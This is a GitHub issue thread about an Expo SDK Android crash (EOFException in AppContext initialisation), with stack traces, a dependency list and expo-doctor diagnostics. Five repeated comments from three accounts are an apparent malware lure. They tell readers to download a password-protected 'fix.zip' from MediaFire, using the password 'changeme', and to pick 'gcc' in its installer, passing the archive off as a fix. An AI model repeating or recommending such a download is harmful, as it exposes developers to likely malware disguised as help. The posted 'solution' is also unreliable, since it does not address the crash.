### ISSUE TITLE
AppContext.<init> java.io.EOFException - Detect premature EOF

### ISSUE THREAD

**Issue by anubisdark** [expo/expo#31181]
### Minimal reproducible example

SDK 49 in the Modelo:ART2PRO 

### What platform(s) does this occur on?

Android

### Where did you reproduce the issue?

in a standalone app

### Summary

Hi there, i have a problem with sdk 49 of expo, in my production version of my app, i have this error:

Fatal Exception: java.util.ServiceConfigurationError
nj.v: Error reading configuration file
java.util.ServiceLoader.fail (ServiceLoader.java:233)

kotlinx.coroutines.Dispatchers.getMain (Dispatchers.java:1)
expo.modules.kotlin.AppContext.<init> (AppContext.java:1)
expo.modules.kotlin.KotlinInteropModuleRegistry.<init> (KotlinInteropModuleRegistry.java:1)
expo.modules.adapters.react.NativeModulesProxy.<init> (NativeModulesProxy.java:1)
expo.modules.adapters.react.ModuleRegistryAdapter.getOrCreateNativeModulesProxy (ModuleRegistryAdapter.java:1)
expo.modules.adapters.react.ModuleRegistryAdapter.createNativeModules (ModuleRegistryAdapter.java:1)
expo.modules.ExpoModulesPackage.createNativeModules (ExpoModulesPackage.java:1)
com.facebook.react.ReactPackageHelper.getNativeModuleIterator (ReactPackageHelper.java:1)
com.facebook.react.NativeModuleRegistryBuilder.processPackage (NativeModuleRegistryBuilder.java:1)
com.facebook.react.ReactInstanceManager.processPackage (ReactInstanceManager.java:1)
com.facebook.react.ReactInstanceManager.processPackages (ReactInstanceManager.java:1)
com.facebook.react.ReactInstanceManager.createReactContext (ReactInstanceManager.java:1)
com.facebook.react.ReactInstanceManager.lambda$runCreateReactContextOnNewThread$2 (ReactInstanceManager.java:1)
java.lang.Thread.run (Thread.java:923)
Caused by java.io.EOFException
Detect premature EOF
sun.misc.IOUtils.readFully (IOUtils.java:68)

kotlinx.coroutines.Dispatchers.getMain (Dispatchers.java:1)
expo.modules.kotlin.AppContext.<init> (AppContext.java:1)
expo.modules.kotlin.KotlinInteropModuleRegistry.<init> (KotlinInteropModuleRegistry.java:1)
expo.modules.adapters.react.NativeModulesProxy.<init> (NativeModulesProxy.java:1)
expo.modules.adapters.react.ModuleRegistryAdapter.getOrCreateNativeModulesProxy (ModuleRegistryAdapter.java:1)
expo.modules.adapters.react.ModuleRegistryAdapter.createNativeModules (ModuleRegistryAdapter.java:1)
expo.modules.ExpoModulesPackage.createNativeModules (ExpoModulesPackage.java:1)
com.facebook.react.ReactPackageHelper.getNativeModuleIterator (ReactPackageHelper.java:1)
com.facebook.react.NativeModuleRegistryBuilder.processPackage (NativeModuleRegistryBuilder.java:1)
com.facebook.react.ReactInstanceManager.processPackage (ReactInstanceManager.java:1)
com.facebook.react.ReactInstanceManager.processPackages (ReactInstanceManager.java:1)
com.facebook.react.ReactInstanceManager.createReactContext (ReactInstanceManager.java:1)
com.facebook.react.ReactInstanceManager.lambda$runCreateReactContextOnNewThread$2 (ReactInstanceManager.java:1)
java.lang.Thread.run (Thread.java:923)

How can i fix this problem?

### Environment

"dependencies": {
    "@expo-google-fonts/lato": "^0.2.3",
    "@expo/config-plugins": "^7.8.0",
    "@expo/prebuild-config": "^6.7.0",
    "@expo/webpack-config": "~19.0.1",
    "@react-native-async-storage/async-storage": "1.21.0",
    "@react-native-clipboard/clipboard": "^1.12.1",
    "@react-native-community/masked-view": "^0.1.11",
    "@react-native-community/netinfo": "11.1.0",
    "@react-native-firebase/analytics": "18.6.2",
    "@react-native-firebase/app": "18.6.2",
    "@react-native-firebase/crashlytics": "18.6.2",
    "@react-native-firebase/messaging": "18.6.2",
    "@react-navigation/material-bottom-tabs": "^6.2.15",
    "@react-navigation/native": "^6.1.6",
    "@react-navigation/native-stack": "^6.9.12",
    "@react-navigation/stack": "^6.3.17",
    "@reduxjs/toolkit": "^1.9.5",
    "@shopify/flash-list": "1.6.3",
    "axios": "^1.6.1",
    "expo": "^50.0.17",
    "expo-app-loading": "^2.1.1",
    "expo-build-properties": "~0.11.1",
    "expo-dev-client": "~3.3.11",
    "expo-face-detector": "~12.6.1",
    "expo-font": "~11.10.3",
    "expo-image": "~1.10.6",
    "expo-local-authentication": "~13.8.0",
    "expo-module-scripts": "^3.1.0",
    "expo-network": "~5.8.0",
    "expo-screen-orientation": "~6.4.1",
    "expo-sharing": "~11.10.0",
    "expo-splash-screen": "~0.26.5",
    "expo-status-bar": "~1.11.1",
    "expo-system-ui": "~2.9.4",
    "moment": "^2.30.1",
    "onesignal-expo-plugin": "^2.0.2",
    "patch-package": "^8.0.0",
    "react": "18.2.0",
    "react-dom": "18.2.0",
    "react-hook-form": "^7.48.2",
    "react-native": "0.73.6",
    "react-native-alert-notification": "^0.4.0",
    "react-native-avoid-softinput": "^4.0.1",
    "react-native-countdown-circle-timer": "^3.2.1",
    "react-native-device-info": "^10.12.0",
    "react-native-dialog": "^9.3.0",
    "react-native-dropdown-picker": "^5.4.6",
    "react-native-encrypted-storage": "^4.0.3",
    "react-native-gesture-handler": "~2.14.0",
    "react-native-get-random-values": "~1.8.0",
    "react-native-markdown-display": "^7.0.0-alpha.2",
    "react-native-material-dialog": "^0.7.7",
    "react-native-modal": "^13.0.1",
    "react-native-paper": "^5.11.3",
    "react-native-public-ip": "^1.0.2",
    "react-native-reanimated": "~3.6.2",
    "react-native-responsive-screen": "^1.4.2",
    "react-native-safe-area-context": "4.8.2",
    "react-native-screens": "~3.29.0",
    "react-native-svg": "14.1.0",
    "react-native-svg-transformer": "1.3.0",
    "react-native-vector-icons": "^9.2.0",
    "react-native-view-shot": "3.8.0",
    "react-redux": "^8.1.2",
    "url": "^0.11.3",
    "util": "^0.12.5",
    "uuid": "^9.0.1"
  },

### Expo Doctor Diagnostics

npx expo-doctor@latest
Need to install the following packages:
  expo-doctor@1.9.1
Ok to proceed? (y) 
✔ Check Expo config for common issues
✔ Check package.json for common issues
✔ Check native tooling versions
✖ Check dependencies for packages that should not be installed directly
✖ Check for common project setup issues
✔ Check for issues with metro config
✔ Check npm/ yarn versions
✔ Check for app config fields that may not be synced in a non-CNG project
✔ Check Expo config (app.json/ app.config.js) schema
✖ Check that packages match versions required by installed Expo SDK
✔ Check for legacy global CLI installed locally
✔ Check that native modules do not use incompatible support packages
✖ Check that native modules use compatible support package versions for installed Expo SDK

Detailed check results:

Expected package @expo/config-plugins@^7.8.0
Found invalid:
  @expo/config-plugins@5.0.4
  @expo/config-plugins@7.6.0
  (for more info, run: npm why @expo/config-plugins)
Expected package @expo/prebuild-config@^6.7.0
Found invalid:
  @expo/prebuild-config@5.0.7
  (for more info, run: npm why @expo/prebuild-config)
Advice: Upgrade dependencies that are using the invalid package versions.

The package "expo-app-loading" has been removed as of SDK 49. You should use expo-splash-screen instead. Learn more.

This project has multiple package manager lock files (yarn.lock, package-lock.json). This may cause EAS build to restore dependencies with a different package manager from what you use in other environments.

The following packages should be updated for best compatibility with the installed expo version:
  expo@50.0.19 - expected version: ~50.0.20
Your project may not work correctly until you install the correct versions of the packages.
Found outdated dependencies
Advice: Use 'npx expo install --check' to review and upgrade your dependencies.

One or more checks failed, indicating possible issues with the project.

**Comment by Lxx-c** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Lxx-c** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by pngjian** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by anubisdark** [comment]
this error is in android 11, with the expo.modules.kotlin.AppContent
